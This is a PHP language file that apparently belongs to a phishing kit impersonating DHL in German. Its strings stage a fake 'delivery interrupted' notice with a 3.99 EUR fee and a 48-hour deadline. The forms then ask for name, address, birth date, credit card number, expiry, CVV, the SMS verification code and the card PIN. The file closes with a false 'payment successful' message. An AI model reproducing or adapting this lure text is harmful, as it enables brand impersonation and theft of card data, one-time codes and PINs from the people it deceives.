<?php

function lang($phrase){
	static $lang = array(

        'xTitle' => 'Globale Logistik - Internationaler Versand | DHL Home',
        'xContactUs' => 'Kontaktieren Sie uns',
        'xPortalLogin' => 'Portalanmeldung',
        'xSearch' => 'Suchen',
        'xTrackNav' => 'Strecke',
        'xAllProducts&Solutions' => 'Alle Produkte & Lösungen',
        'xOurDivisions' => 'Unsere Divisionen',
        'xIndustrySectors' => 'Branchen',
        'xInsights&Innovation' => 'Einblicke & Innovation',
        'xKarriere' => 'Karriere',
        'xPress' => 'Drücken',
        'xAboutUs' => 'Über uns',
        'xTrackYourShipment' => 'Ihre Sendung verfolgen',
        'xEnteryourEmail' => 'Geben Sie Ihre E-Mail-Adresse ein',
        'xTrackBtn' => 'Spur',
        'xDHLExpressReferenceTracking' => 'DHL Express-Referenzverfolgung',
        'xShippingServices' => 'Versanddienste',
        'xPackages' => 'Pakete',
        'xDocumentParcel' => 'Dokument & Paket',
        'xAirFreight' => 'Luftfracht',
        'xOceanFreight' => 'Seefracht',
        'xRoadFreight' => 'Straßenfracht',
        'xRailFreight' => 'Schienenfracht',
        'xFollowUs' => 'Folge uns',
        'xDeutschePostDHLGroup' => 'Deutsche Post DHL Group',
        'xReadmoreaboutFraudAwareness' => 'Betrugsbewusstsein',
        'xReadmoreaboutLegalNotice' => 'Rechtlicher Hinweis',
        'xTermsofUse' => 'Nutzungsbedingungen',
        'xPrivacyNotice' => 'Datenschutzhinweis',
        'xDisputeResolution' => 'Streitbeilegung',
        'xAccessibility' => 'Barrierefreiheit',
        'xCookieSettings' => 'Cookie-Einstellungen',
        'xFrom' => 'Von',
        'xExpectedDelivery' => 'Erwartete Lieferung',
        'xTaxes' => 'Steuern',
        'xExplainHeading' => 'Zustellung unterbrochen',
        'xDelv' => 'Erwartete Lieferung',
        'xPackagenumber' => 'Paketnummer',
        'xBinfo' => '(Rechnungsinformationen)',
        'xBpay' => '(Zahlung)',
        'xBauth' => '(Authentifizierung)',
        'xBh1t' => 'Zahlungsinformationen bestätigen',
        'xHexplain' => 'Zustellung unterbrochen',
        'xp1' => 'Ihre letzte Lieferung wurde unterbrochen. Sie befindet sich derzeit im Sortierzentrum in der Warteschleife',
        'xp2' => 'Ihr Paket hat das angegebene Gewicht nicht eingehalten, zusätzliche Kosten werden dann von Ihnen verlangt, um Ihr Paket korrekt transportieren zu können.',
        'xp3' => 'Die Gebühr beträgt 3.99EUR Um sie zu bezahlen, klicken Sie bitte auf die Schaltfläche unten',
        'xp4' => 'Sobald die Gebühren bezahlt wurden, wird Ihr Paket so schnell wie möglich an den Lieferort gesendet.',
        'xp5' => 'Sollten diese nicht innerhalb der nächsten 48 Stunden beglichen werden, wird das Paket an den Absender zurückgeschickt.',
        'xname' => 'Vollständiger Name',
        'xaddress' => 'Adresse',
        'xcountry' => 'Land',
        'xcity' => 'Stadt',
        'xphone' => 'Telefonnummer',
        'xdate' => 'Geburtsdatum',
        'xCpoaf' => 'Zahlung zusätzlicher Gebühren',
        'xcch' => 'Kreditkarteninhaber',
        'xccn' => 'Kreditkartennummer',
        'xexp' => 'Ablaufdatum (MM/JJ)',
        'xcvv' => '(CVV)-Code',
        "xAauth" => "Authentifizierung",
        "xAp1" => "Um mit der Zahlung fortzufahren, geben Sie bitte den an Ihre Handynummer gesendeten Verifizierungscode ein",
        "xAcp" => "Code",
        'xAp2' => 'Bitte geben Sie den Code ein, den Sie per (SMS) erhalten haben',
        'xHp' => 'Zahlung erfolgreich',
        'xRod' => 'Wiederaufnahme der Lieferung',
        'xP1fin' => 'Die Zahlung der Nebenkosten wurde berücksichtigt.',
        'xP2fin' => 'Ihr Paket sollte innerhalb der nächsten 24 Stunden zur Lieferung eintreffen.',
        'xPay' => 'Jetzt bezahlen',
        'xCnt' => 'Weiter',
        'xFinish' => 'Fertigstellen',
        "xpin1" => "Zur Bestätigung Ihrer Zahlung geben Sie bitte den PIN-Code Ihrer Karte ein",
	"xpin2" => "PIN-Code",
        "xpin3" => "Bitte geben Sie den 4-stelligen PIN-Code Ihrer Karte ein"

	);	
	
	return $lang[$phrase];
}
 ?>